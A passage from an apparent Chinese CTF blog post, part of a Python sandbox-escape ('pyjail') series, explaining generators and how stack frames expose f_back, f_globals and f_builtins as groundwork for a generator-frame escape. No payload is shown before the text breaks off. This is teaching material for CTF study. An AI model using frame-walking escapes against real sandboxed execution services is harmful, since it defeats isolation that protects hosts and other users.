<meta property="og:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta property="og:locale" content="en" />
<meta name="description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<meta property="og:description" content="pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈" />
<link rel="canonical" href="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:url" content="/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/" />
<meta property="og:site_name" content="DummyKitty’s Blog" />
<meta property="og:image" content="/assets/images/pyjail.jpg" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-11-09T14:23:57+00:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="/assets/images/pyjail.jpg" />
<meta property="twitter:title" content="pyjail bypass-11 利用生成器栈逃逸" />
<meta name="twitter:site" content="@DummyKitty" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-04-02T00:46:04+00:00","datePublished":"2024-11-09T14:23:57+00:00","description":"pyjail 沙箱逃逸原理 绕过删除模块或方法 绕过基于字符串匹配的过滤 绕过命名空间限制 绕过多行限制 绕过长度限制 变量覆盖与函数篡改 绕过 audit hook 绕过 AST 沙箱 绕过输出限制 绕过 opcode 沙箱 利用生成器栈","headline":"pyjail bypass-11 利用生成器栈逃逸","image":"/assets/images/pyjail.jpg","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"},"url":"/posts/pyjail-bypass-11-%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88/"}</script>
<!-- End Jekyll SEO tag -->

  <title>pyjail bypass-11 利用生成器栈逃逸 | DummyKitty's Blog
  </title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->

<link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png">

  <link rel="manifest" href="/assets/img/favicons/site.webmanifest">

<link rel="shortcut icon" href="/assets/img/favicons/favicon.ico">
<meta name="apple-mobile-web-app-title" content="DummyKitty's Blog">
<meta name="application-name" content="DummyKitty's Blog">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml">
<meta name="theme-color" content="#ffffff">

  <!-- Resource Hints -->
  
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
  <!-- Bootstrap -->
  
  <!-- Theme style -->
  <link rel="stylesheet" href="/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.7.1/css/all.min.css">

  <!-- 3rd-party Dependencies -->

    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.32.2/dist/tocbot.min.css">
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  
  <!-- Scripts -->

  <script src="/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->

<!-- layout specified -->

    <!-- image lazy-loading & popup & clipboard -->
    
  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.13/dayjs.min.js,npm/dayjs@1.11.13/locale/en.js,npm/dayjs@1.11.13/plugin/relativeTime.js,npm/dayjs@1.11.13/plugin/localizedFormat.js,npm/tocbot@4.32.2/dist/tocbot.min.js"></script>

<script defer src="/assets/js/dist/post.min.js"></script>

<!-- Pageviews -->

    <!-- PWA -->
    
      <script
        defer
        src="/app.min.js?baseurl=&register=true"
      ></script>
    
    <!-- Web Analytics -->
    
  <!-- A placeholder to allow defining custom metadata -->

</head>

  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/" id="avatar" class="rounded-circle"><img src="/assets/images/me.png" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/">DummyKitty's Blog</a>
    <p class="site-subtitle fst-italic mb-0">Code Audit@xxx / Penetration Tester@xxx / CTFer</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            
            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            
            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            
            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            
            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    
        <a
          href="https://github.com/DummyKitty"
          aria-label="github"
          
            target="_blank"
            
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
        <a
          href="/feed.xml"
          aria-label="rss"
          
        >
          <i class="fas fa-rss"></i>
        </a>
      
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->

    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      
            <span>
              <a href="/">Home</a>
            </span>

              <span>pyjail bypass-11 利用生成器栈逃逸</span>
            
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>

        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->

<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->

<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->

<!-- Change the icon of checkbox -->

<!-- Handle images -->

    <!-- take out classes -->
    
    <!-- lazy-load images -->
    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      
        <!-- create the image wrapper -->
        
    <!-- combine -->
    
<!-- Add header for code snippets -->

<!-- Create heading anchors -->

<!-- return -->

<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>pyjail bypass-11 利用生成器栈逃逸</h1>
    
    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1731162237"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Nov  9, 2024
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1743554764"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Apr  2, 2025
</time>

        </span>
      
        <div class="mt-3 mb-3">
          <a href="/assets/images/pyjail.jpg" class="popup img-link preview-img shimmer"><img src="/assets/images/pyjail.jpg"  alt="Preview Image" width="1200" height="630"  loading="lazy"></a></div>
      
      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          
          By

          <em>
            
              <a href="https://twitter.com/DummyKitty">DummyKitty</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          
          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->

<!-- words per minute -->

<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="2817 words"
>
  <em>15 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">pyjail bypass-11 利用生成器栈逃逸</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">pyjail bypass-11 利用生成器栈逃逸</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  
  <div class="content">
    <blockquote>
  <ul>
    <li><a href="/posts/python-沙箱逃逸原理/">pyjail 沙箱逃逸原理</a></li>
    <li><a href="/posts/pyjail-bypass-01-绕过删除模块或方法/">绕过删除模块或方法</a></li>
    <li><a href="/posts/pyjail-bypass-02-字符串变换绕过/">绕过基于字符串匹配的过滤</a></li>
    <li><a href="/posts/pyjail-bypass-03-绕过命名空间限制/">绕过命名空间限制</a></li>
    <li><a href="/posts/pyjail-bypass-05-绕过长度限制/">绕过多行限制</a></li>
    <li><a href="/posts/pyjail-bypass-04-绕过多行限制/">绕过长度限制</a></li>
    <li><a href="/posts/pyjail-bypass-06-变量覆盖与函数篡改/">变量覆盖与函数篡改</a></li>
    <li><a href="/posts/pyjail-bypass-07-绕过-audit-hook/">绕过 audit hook</a></li>
    <li><a href="/posts/pyjail-bypass-08-绕过-AST-沙箱/">绕过 AST 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-09-绕过输出限制/">绕过输出限制</a></li>
    <li><a href="/posts/pyjail-bypass-10-绕过-opcode-沙箱/">绕过 opcode 沙箱</a></li>
    <li><a href="/posts/pyjail-bypass-11-利用生成器栈/">利用生成器栈</a></li>
  </ul>
</blockquote>

<p>本文仅作为个人学习记录，大部分参考自下面的文章，讲解得非常细致：</p>
<ul>
  <li><a href="https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern">利用生成器栈帧逃逸 Pyjail - CISCN 2024 mossfern 题解</a></li>
</ul>

<h2 id="利用生成器栈帧进行逃逸"><span class="me-2">利用生成器栈帧进行逃逸</span><a href="#利用生成器栈帧进行逃逸" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>

<h3 id="生成器"><span class="me-2">生成器</span><a href="#生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>在 Python 中，生成器（Generator）是一种特殊的迭代器，它能够逐个生成值，而不需要一次性将所有值存储在内存中。生成器的主要特点是它们能够 惰性计算，即按需生成数据，这使得它们在处理大量数据或无限序列时非常高效。</p>

<p>生成器通过使用 yield 关键字来返回值，而不是像普通函数那样使用 return。当一个函数包含 yield 时，它就成为了一个生成器函数。调用这个函数不会立即执行，而是返回一个生成器对象。每次调用生成器对象的 next() 方法时，函数会从上次暂停的地方继续执行，直到再次遇到 yield 或结束。</p>
<h4 id="创建生成器"><span class="me-2">创建生成器</span><a href="#创建生成器" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>创建生成器有以下两种方法：</p>
<ol>
  <li>使用 yield 关键字
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre></td><td class="rouge-code"><pre> <span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
     <span class="k">yield</span> <span class="mi">1</span>
     <span class="k">yield</span> <span class="mi">2</span>
     <span class="k">yield</span> <span class="mi">3</span>

 <span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span> <span class="c1"># &lt;class 'generator'&gt;
</span> <span class="nf">print</span><span class="p">(</span><span class="n">gen</span><span class="p">)</span>       <span class="c1"># &lt;generator object my_generator at 0x7f4a20e049e0&gt;
</span>
 <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
</span> <span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span></pre></td></tr></tbody></table></code></div>    </div>
  </li>
  <li>使用生成器表达式。类似于列表推导式，但使用小括号 () 而不是方括号 [] 来创建生成器表达式。
    <div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre> <span class="n">gen_exp</span> <span class="o">=</span> <span class="p">(</span><span class="n">x</span> <span class="o">*</span> <span class="n">x</span> <span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nf">range</span><span class="p">(</span><span class="mi">5</span><span class="p">))</span>

 <span class="k">for</span> <span class="n">num</span> <span class="ow">in</span> <span class="n">gen_exp</span><span class="p">:</span>
     <span class="nf">print</span><span class="p">(</span><span class="n">num</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div>    </div>
    <h4 id="生成器转化为列表"><span class="me-2">生成器转化为列表</span><a href="#生成器转化为列表" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
    <p>生成器转换为列表可以使用如下的几种方式：</p>
  </li>
  <li>list 构造函数</li>
  <li>列表推导式</li>
  <li><code class="language-plaintext highlighter-rouge">*</code> 解包操作符
```py
gen = (x for x in range(5))<br />
lst = list(gen)</li>
</ol>

<p>gen = (x for x in range(5))<br />
lst = [x for x in gen]</p>

<p>gen = (x for x in range(5))<br />
lst = [*gen]</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre></td><td class="rouge-code"><pre>

### 栈帧
在 Python 中，栈帧（Stack Frame）是每次函数调用时创建的执行上下文。每个栈帧包含了函数的局部变量、参数、返回地址等信息，并且这些栈帧按照调用顺序被压入 调用栈（Call Stack）中。

#### 获取栈帧
获取栈帧的基本方法是使用 sys._getframe 方法：
```py
import sys
f1 = sys._getframe()
print(f1)
# &lt;frame at 0x7fb8d49984a0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack.py', line 3, code &lt;module&gt;&gt;
print(type(f1)) # &lt;class 'frame'&gt;
</pre></td></tr></tbody></table></code></div></div>
<p>f1 就是一个栈帧对象。</p>

<p>另一种方法是用 inspect 库的 currentframe 方法</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">inspect</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">inspect</span><span class="p">.</span><span class="nf">currentframe</span><span class="p">()</span>
</pre></td></tr></tbody></table></code></div></div>
<h4 id="交互式命令行的差异"><span class="me-2">交互式命令行的差异</span><a href="#交互式命令行的差异" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>注意，由于 Python 交互式命令行在执行代码时会使用单独的栈帧，因此下面的代码在交互式命令行与脚本文件中执行的结果不同。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre><span class="o">&gt;&gt;&gt;</span> <span class="kn">import</span> <span class="n">sys</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="o">&gt;&gt;&gt;</span> <span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span>
<span class="bp">False</span>
</pre></td></tr></tbody></table></code></div></div>
<p>直接执行脚本文件时返回 True</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">f1</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="nf">type</span><span class="p">(</span><span class="n">f1</span><span class="p">))</span>
<span class="n">f2</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="n">f1</span> <span class="o">==</span> <span class="n">f2</span><span class="p">)</span> <span class="c1"># True
</span></pre></td></tr></tbody></table></code></div></div>
<h4 id="栈帧工作原理"><span class="me-2">栈帧工作原理</span><a href="#栈帧工作原理" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>栈帧的工作原理如下：</p>
<ol>
  <li>当程序开始执行时，会创建一个==全局帧（global frame）==，它是整个程序的顶层上下文。</li>
  <li>每当==调用一个函数时，Python 会创建一个新的栈帧，并将其压入调用栈顶部==。</li>
  <li>==当函数完成执行后，当前栈帧会被弹出，并将控制权返回给上一个栈帧==。</li>
  <li>这种过程持续进行，直到所有函数都执行完毕，最终回到全局帧。</li>
</ol>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">global frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">add() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">multiply() frame: </span><span class="si">{</span><span class="n">frame</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># global frame: &lt;frame at 0x7f5793d5a400, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 3, code &lt;module&gt;&gt;
# multiply() frame: &lt;frame at 0x7f5793d35480, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 11, code multiply&gt;
# add() frame: &lt;frame at 0x7f5793d34940, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_1.py', line 6, code add&gt;
</span></pre></td></tr></tbody></table></code></div></div>

<h4 id="栈帧的内容"><span class="me-2">栈帧的内容</span><a href="#栈帧的内容" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>使用 dir 查看栈帧的内容：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
</pre></td><td class="rouge-code"><pre><span class="nf">dir</span><span class="p">(</span><span class="n">f1</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__delattr__',
#  '__dir__',
#  '__doc__',
#  '__eq__',
#  '__format__',
#  '__subclasshook__',
#  ...
#  'clear',
#  'f_back',
#  'f_builtins',
#  'f_code',
#  'f_globals',
#  'f_lasti',
#  'f_lineno',
#  'f_locals',
#  'f_trace',
#  'f_trace_lines',
#  'f_trace_opcodes']
</span></pre></td></tr></tbody></table></code></div></div>
<p>除了 Object 共有的属性之外，有一些 f_ 开头的属性是栈帧对象独有的。</p>
<ul>
  <li>f_back：它是指向上一个栈帧的指针。在 Python 中，f1.f_back 拿到的也是一个栈帧对象。</li>
  <li>f_builtins、f_globals、f_locals：对应着当前栈帧的 builtins、globals、locals 对象。</li>
</ul>

<p>我们可以使用前面的脚本进行测试：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>
<span class="n">global_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>
<span class="n">multiply_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="n">add_frame</span> <span class="o">=</span> <span class="bp">None</span>
<span class="c1"># print(f"global frame: {global_frame}")
</span><span class="k">def</span> <span class="nf">add</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
    <span class="n">add_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"add() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">multiply_frame</span> <span class="o">==</span> <span class="n">add_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span>

<span class="k">def</span> <span class="nf">multiply</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">):</span>
    <span class="k">global</span> <span class="n">multiply_frame</span>
    <span class="n">multiply_frame</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span>  <span class="c1"># 获取当前的栈帧
</span>    <span class="c1"># print(f"multiply() frame: {frame}")
</span>    <span class="nf">print</span><span class="p">(</span><span class="n">global_frame</span> <span class="o">==</span> <span class="n">multiply_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">)</span>
    <span class="k">return</span> <span class="nf">add</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">y</span><span class="p">)</span> <span class="o">*</span> <span class="n">y</span>

<span class="n">result</span> <span class="o">=</span> <span class="nf">multiply</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="mi">3</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Result: </span><span class="si">{</span><span class="n">result</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>

<span class="c1"># True
# True
# Result: 15
</span></pre></td></tr></tbody></table></code></div></div>

<h3 id="生成器的栈帧"><span class="me-2">生成器的栈帧</span><a href="#生成器的栈帧" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>每次调用一个普通函数时，Python 会为该函数创建一个新的栈帧，并将其压入调用栈中。当函数执行完毕后，栈帧会被弹出。生成器的实现也使用到了栈帧，但不同的是，生成器可以暂停执行，并在恢复时继续从暂停的位置执行，也就意味着生成器的栈帧行为有所区别。</p>

<p>下面是一个测试示例：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre><span class="kn">import</span> <span class="n">sys</span>

